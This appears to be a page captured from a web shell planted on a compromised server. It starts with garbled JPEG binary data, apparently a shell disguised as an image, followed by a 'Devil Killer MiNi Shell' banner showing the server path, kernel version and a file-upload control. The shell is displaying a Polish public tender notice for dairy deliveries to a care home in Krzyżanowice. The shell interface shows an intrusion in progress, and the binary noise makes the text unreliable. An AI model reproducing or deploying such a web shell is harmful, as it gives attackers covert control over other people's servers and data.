JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220922/0036081201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i sukcesywna dostawa żywności na potrzeby <br/>Domu Pomocy Społecznej w Krzyżanowicach IV kwartał roku 2022”<br/> ZADANIE PODZIELONE NA 2 CZĘŚCI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej w Krzyżanowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000295231</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">219</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iłża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@dpskrzyzanowice.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dpskrzyzanowice.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i sukcesywna dostawa żywności na potrzeby <br/>Domu Pomocy Społecznej w Krzyżanowicach IV kwartał roku 2022”<br/> ZADANIE PODZIELONE NA 2 CZĘŚCI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4421e075-3a87-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00360812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040619/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 „Zakup i sukcesywna dostawa żywności na potrzeby Domu Pomocy Społecznej w Krzyżanowicach IV kwartał roku 2022” ZADANIE PODZIELONE NA 2 CZĘŚCI</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dpskrzyzanowice.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dpskrzyzanowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:WYMAGANIA TECHNICZNE I<br/>ORGANIZACYJNE WYSYŁANIA I ODBIERANIA KORESPONDENCJI<br/>ELEKTRONICZNEJ PRZEKAZYWANEJ PRZY ICH UŻYCIU OPISANE ZOSTAŁY W REGULAMINIE<br/>KORZYSTANIA Z PLATFORMY ZAKUPOWEJ ZAMAWIAJĄCEGO MARKETPLANET POD ADRESEM<br/>https://oneplace.marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:1. administratorem Pani/Pana danych osobowych jest: Dyrektor Dom Pomocy<br/>Społecznej w<br/>Krzyżanowicach, z siedzibą w Krzyżanowice 219, 27-100 Iłża, tel. (48) 616 30 27, adres e-mail:<br/>dpomocy@kki.pl Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 pzp;<br/>1) Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego, zgodnie z wymaganiami określonymi w ustawie z dnia<br/>11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 ze zm.), a następnie<br/>zawarcia umowy z wybranym wykonawcą, jej realizacji oraz rozliczenia,;<br/>2) podstawą przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b) i c) ogólnego<br/>rozporządzenia o ochronie danych z dnia 27 kwietnia 2016 r., tj. przetwarzanie jest niezbędne do<br/>wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie<br/>osoby, której dane dotyczą, przed zawarciem umowy oraz przetwarzanie jest niezbędne do<br/>wypełnienia obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych;<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 74 ustawy Pzp, a także art. 6 ustawy z 6<br/>września 2001 r. o dostępie do informacji publicznej.<br/>4) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z w/w ustawy;<br/>5) posiada Pani/Pan prawo do:<br/>• żądania dostępu do treści swoich danych osobowych, ich sprostowania lub ograniczenia<br/>przetwarzania,<br/>• wniesienia skargi do organu nadzorczego - Prezesa Urzędu Ochrony Danych Osobowych;<br/>6) nie przysługuje Pani/Panu<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>7) Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu;<br/>8) Pani/Pana Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane<br/>przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. informujemy iż: w<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.<br/>skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.Zd.27.271.8.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa nabiału i wyrobów mleczarskie. Produkty mleczarskie cechować ma świeżość, dobry smak po otwarciu produktów, niezbrylone sery naturalne, gęste jogurty. <br/>Termin przydatności produktów do spożycia ma być nie krótszy niż 14 dni od dnia dostawy do Zamawiającego dla produktów: twarogi, kefir maślanka, nie krótszy niż 21 dni od daty dostawy dla następujących produktów: masło, jogurty, śmietany, sery żółte, serki twarogowe do smarowania, pozostałe sery oraz nie krótszy niż 4 miesiące od daty dostawy dla następujących produktów: mleko krowie, mleko sojowe, ser topiony, masło klarowane.<br/><br/>Lp	Nazwa artykułu	kod CPV	Jedn miary	ilość<br/>1	Jogurt naturalny 150g w składzie m.inn.żywe kultury bakterii jogurtowych , bez mleka w proszku	15551310-1	szt	4 900<br/>2	Jogurt owocowy 140gr posiadajacy w składzie min. 7% wsadu owocowego, żywe kultury bakterii jogurt., bez syropu glukozowo-fruktozowego	15551320-4	szt	2 800<br/>3	Jogurt Skyr 150g	15551320-4	szt	20<br/>4	Margaryna miękka 60% tłuszczu 450 g	15431000-8	szt	270<br/>5	Kefir 400ml 15431000-8	szt	15<br/>6	Margaryna twarda 80% tłuszczu 250 g	15431000-8	szt	70<br/>7	Masło extra 82%-86% 200g	15530000-2	szt	750<br/>8	Mleko 2% tłuszczu op.5l Piątnica, Figand, Włoszczowa, Rolmlecz, Mlekovita, Mlekpol	15511400-7	l	3 400<br/>9	Mleko w proszku pełne	15511700-0	kg	3,00<br/>10	Ser twardy żóty Gouda	15544000-3	kg	85<br/>11	Serek do smar. piecz. 100g bez mleka w proszku	15545000-0	szt	650<br/>12	Serek topiony 100 gr śmietankowy w składzie m.in.: min.50% mleka, min.27% sera	15545000-0	szt	20<br/>13	Serek homogenizowany 150g, bez mleka w proszku, bez syropu glukozowo-fruktozowego, bez substancji zagęszczających	15543000-6	szt	250<br/>14	Śmietana 18% 400 g typu Piątnica, Figand, Włoszczowa, Rolmlecz, Mlekovita, Mlekpol	15512200-2	szt	460<br/>15	Twarożek wiejski 150g typu Piątnica, Krasnystaw, Garwolin, Łowicz	15542100-0	szt	600<br/>16	Twaróg półtłusty Piątnica, Figand, Włoszczowa, Rolmlecz, Mlekovita, Mlekpol	15542100-0	kg	250<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15530000-2 - Masło</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował<br/>się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie<br/>oceniał spełnienie kryteriów:<br/>5.2 Cena -waga 60 % = 60 pkt<br/>5.3 Czas konieczny na wymianę lub uzupełnienie towaru”- waga 40%= 40pkt<br/>PUNKTACJA BĘDZIE ZASTOSOWANA DO KAŻDEJ CZĘŚCI ZAMÓWIENIA ODDZIELNIE.<br/>Zamawiający oceni i porówna jedynie oferty, które nie zostaną odrzucone.<br/>1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą:<br/>Łączna cena oferty brutto – 60,00 pkt. = 60% dla poszczególnych części zamówienia<br/>Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 pkt. = 40%<br/>2. Przy ocenie kryterium „Cena” zostanie wykorzystany wzór: cena najniższa z ważnych ofert/ cena<br/>badanej oferty x 60 Maksymalna ilość punktów, jaką może uzyskać oferta<br/>w kryterium „Cena” wynosi 60.<br/>Według wzoru : CN / CO x 60<br/>3. Ocena kryterium „Czas konieczny na wymianę lub uzupełnienie towaru”- waga 40%<br/>tj. czas na wymianę wadliwego lub o obniżonej jakości towaru lub uzupełnienia braków liczony od<br/>momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym opóźnieniu w<br/>dostawie w stosunku do godzin wyszczególnionych<br/>w załączniku nr 10 do SWZ.<br/>Punkty zostaną przyznane w następujący sposób:<br/>40 pkt. – 60 min<br/>20 pkt. – 90 min<br/>0 pkt. – 180 min i więcej.<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub<br/>uzupełnienie towaru” wynosi 40pkt.<br/>Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru, będzie skutkowało<br/>przyporządkowaniem okresu 180 min i więcej- w związku z czym wykonawca w tym kryterium otrzyma<br/>0 punków.<br/>4. Oferty oceniane będą punktowo.<br/>Maksymalną ilość punktów, jaką może osiągnąć oferta wynosi 100.<br/>5. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według<br/>następującej zasady: pkt. w kryterium CENA + pkt. W kryterium CZAS KONIECZNY NA WYMIANĘ<br/>LUB UZUPEŁNIENIE TOWARU = suma pkt.<br/>Wyjaśnienia:<br/>CN - cena oferty najtańszej<br/>CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa nabiału i wyrobów mleczarskie bez laktozy.<br/>	Produkty mleczarskie cechować ma świeżość, dobry smak po otwarciu produktów, niezbrylone sery naturalne, gęste jogurty. <br/>	Termin przydatności produktów do spożycia ma być nie krótszy niż 14 dni od dnia dostawy do Zamawiającego dla produktów: twarogi, kefir maślanka, nie krótszy niż 21 dni od daty dostawy dla następujących produktów: masło, jogurty, śmietany, sery żółte, serki twarogowe do smarowania, pozostałe sery oraz nie krótszy niż 4 miesiące od daty dostawy dla następujących produktów: mleko krowie, mleko sojowe, ser topiony, masło klarowane.<br/>Lp	Nazwa artykułu	kod CPV	Jedn miary	ilość<br/>1	Jogurt naturalny 180g bez laktozy 15551310-1	szt	80<br/>2	Jogurt owocowy 250g bez laktozy	15551320-4	szt	55<br/>6	Masło extra 82%-86% 200g bez laktozy	15530000-2	szt	15<br/>7	Mleko 1,5% tłuszczu 0,5l bez laktozy	15511400-7	szt	20<br/>9	Ser twardy żóty Gouda bez laktozy 150g	15544000-3	szt	10<br/>12	Serek homogenizowany 150g bez laktozy	15543000-6	szt	20<br/>13	Śmietana 18% bez laktozy 200g	15512200-2	szt	10<br/>14	Twarożek wiejski bez laktozy 180g	15512200-2	szt	27<br/>16	Twaróg półtłusty bez laktozy 230g	15542100-0	szt	9 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował<br/>się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie<br/>oceniał spełnienie kryteriów:<br/>5.2 Cena -waga 60 % = 60 pkt<br/>5.3 Czas konieczny na wymianę lub uzupełnienie towaru”- waga 40%= 40pkt<br/>PUNKTACJA BĘDZIE ZASTOSOWANA DO KAŻDEJ CZĘŚCI ZAMÓWIENIA ODDZIELNIE.<br/>Zamawiający oceni i porówna jedynie oferty, które nie zostaną odrzucone.<br/>1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą:<br/>Łączna cena oferty brutto – 60,00 pkt. = 60% dla poszczególnych części zamówienia<br/>Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 pkt. = 40%<br/>2. Przy ocenie kryterium „Cena” zostanie wykorzystany wzór: cena najniższa z ważnych ofert/ cena<br/>badanej oferty x 60 Maksymalna ilość punktów, jaką może uzyskać oferta<br/>w kryterium „Cena” wynosi 60.<br/>Według wzoru : CN / CO x 60<br/>3. Ocena kryterium „Czas konieczny na wymianę lub uzupełnienie towaru”- waga 40%<br/>tj. czas na wymianę wadliwego lub o obniżonej jakości towaru lub uzupełnienia braków liczony od<br/>momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym opóźnieniu w<br/>dostawie w stosunku do godzin wyszczególnionych<br/>w załączniku nr 10 do SWZ.<br/>Punkty zostaną przyznane w następujący sposób:<br/>40 pkt. – 60 min<br/>20 pkt. – 90 min<br/>0 pkt. – 180 min i więcej.<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub<br/>uzupełnienie towaru” wynosi 40pkt.<br/>Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru, będzie skutkowało<br/>przyporządkowaniem okresu 180 min i więcej- w związku z czym wykonawca w tym kryterium otrzyma<br/>0 punków.<br/>4. Oferty oceniane będą punktowo.<br/>Maksymalną ilość punktów, jaką może osiągnąć oferta wynosi 100.<br/>5. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według<br/>następującej zasady: pkt. w kryterium CENA + pkt. W kryterium CZAS KONIECZNY NA WYMIANĘ<br/>LUB UZUPEŁNIENIE TOWARU = suma pkt.<br/>Wyjaśnienia:<br/>CN - cena oferty najtańszej<br/>CO - cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 